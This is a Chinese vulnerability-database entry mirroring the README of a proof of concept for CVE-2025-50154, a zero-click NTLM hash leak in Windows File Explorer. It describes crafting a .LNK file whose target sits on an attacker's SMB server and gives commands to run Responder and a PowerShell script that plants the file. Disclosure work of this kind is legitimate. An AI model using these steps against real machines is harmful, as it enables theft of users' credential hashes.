关联漏洞
标题:
Microsoft Windows File Explorer 信息泄露漏洞
(CVE-2025-50154)
描述:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响:Windows 10 Version 21H2 for ARM64-based Systems,Windows 10 Version 21H2 for x64-based Systems,Windows 11 Version 22H2 for A
描述
POC for CVE-2025-50154, a zero day vulnerability on windows file explorer disclosing NTLMv2-SSP without user interaction. It is a bypass for the CVE-2025-24054 Security Patch
介绍
# CVE-2025-50154
# Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
By [Ruben Enkaoua](https://x.com/rubenlabs) and [Cymulate](https://cymulate.com/)
<br>
<br>
[Original Blog: Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154)](https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/)
<br>
<br>
#### Description
<br>
While Microsoft released a security update addressing an icon-based NTLM hash disclosure vulnerability, I discovered a bypass that still allows an attacker to retrieve NTLMv2-SSP hashes without user interaction.<br><br>
The original vulnerability, recently patched, was a 0-click NTLM hash disclosure triggered when explorer.exe rendered the icon of a .LNK shortcut file whose icon was hosted on a remote SMB server.<br>
After the patch, explorer.exe no longer loads icons from remote SMB paths, preventing the automatic disclosure of NTLM hashes.<br><br>
By crafting a .LNK file with:<br>
+ Default icon from shell32.dll<br>
+ Target path pointing to a remote SMB-hosted binary file<br><br>
The explorer.exe process will still fetch the remote file to extract the PE icon from its RT_GROUP_ICON and RT_ICON resources.<br><br>
#### Steps
<br>
Start a responder server in your server<br><br>
```bash
responder -I <interface> -v
```
<br>
Craft a malicious LNK with powershell, in a different machine, and then drop it to the victim (malicious download, SMB upload...)<br><br>
```powershell
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"
```
<br>
The explorer.exe process will render the icon by downloading the file automatically, looking for RT_ICON and RT_GROUP_ICON headers in .rsrc section
<br><br>
#### Notes
<br>
This code is for educational and research purposes only.<br>
The author takes no responsibility for any misuse of this code.
文件快照
[4.0K] /data/pocs/bd2e26a6bc58677f6fdcb1be67de7b2f275ca106
├── [1.5K] LICENSE
├── [1.6K] poc.ps1
└── [2.0K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。